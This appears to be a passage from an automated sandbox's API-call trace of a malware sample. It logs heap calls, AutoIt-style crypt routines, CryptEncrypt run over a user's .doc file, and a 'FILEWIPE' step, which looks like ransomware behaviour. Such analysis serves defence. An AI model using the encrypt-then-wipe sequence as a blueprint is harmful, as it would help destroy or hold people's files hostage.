lpMsg=0x6ae324) returned 0 [0031.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0031.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0031.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0031.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0031.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0031.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0031.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0031.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0031.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0031.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0031.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.130] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0031.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb98 [0031.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0031.130] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0031.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0031.130] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.130] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0031.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0031.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0031.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0031.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0031.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0031.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0031.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0031.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0031.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0031.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0031.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0031.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0031.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0031.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0031.131] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0031.131] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0031.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0031.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0031.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0031.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0031.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0031.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0031.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0031.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0031.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0031.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0031.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0031.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0031.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0031.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0031.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0031.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0031.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0031.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0031.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0031.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0031.132] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0031.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0031.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0031.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0031.132] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0031.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0031.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0031.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0031.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0031.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0031.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0031.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0031.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0031.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0031.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0031.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0031.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.133] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.133] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.133] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da2c8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2c8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0031.133] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.133] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.133] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.133] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.133] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.133] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.133] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.134] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.134] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.134] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0031.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0031.134] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.134] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0031.134] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.134] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.134] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.134] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0031.134] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.134] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0031.134] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.134] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0031.135] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.135] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x1396e, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x13970) returned 1 [0031.135] CharLowerBuffW (in: lpsz="byte[80241]", cchLength=0xb | out: lpsz="byte[80241]") returned 0xb [0031.137] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.137] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.137] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.137] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8cac18*, pdwDataLen=0x6ae220*=0x1396e, dwBufLen=0x13970 | out: pbData=0x8cac18*, pdwDataLen=0x6ae220*=0x13970) returned 1 [0031.138] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0031.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.138] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.138] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.138] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0031.148] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0031.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.148] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.148] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.148] CryptDestroyKey (hKey=0x7c2280) returned 1 [0031.148] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0031.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.148] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0031.148] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.148] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.149] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0031.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.149] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.149] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0031.149] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0031.149] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0031.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0031.149] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.149] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0031.149] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.149] FreeLibrary (hLibModule=0x754b0000) returned 1 [0031.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0031.149] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0031.151] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0031.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0031.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0031.151] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\HaqrV LVwyHV.doc", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73802d50, ftCreationTime.dwHighDateTime=0x1d5b6ba, ftLastAccessTime.dwLowDateTime=0xad2c0a0, ftLastAccessTime.dwHighDateTime=0x1d5b684, ftLastWriteTime.dwLowDateTime=0xad2c0a0, ftLastWriteTime.dwHighDateTime=0x1d5b684, nFileSizeHigh=0x0, nFileSizeLow=0x1396e, dwReserved0=0x0, dwReserved1=0x777648, cFileName="HaqrV LVwyHV.doc", cAlternateFileName="HAQRVL~1.DOC")) returned 0x7c2240 [0031.151] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0031.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0031.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0031.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0031.151] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0031.151] CharLowerBuffW (in: lpsz="byte[80238]", cchLength=0xb | out: lpsz="byte[80238]") returned 0xb [0031.152] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0031.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0031.152] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0031.152] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0031.152] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0031.153] FreeLibrary (hLibModule=0x76b40000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0031.153] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 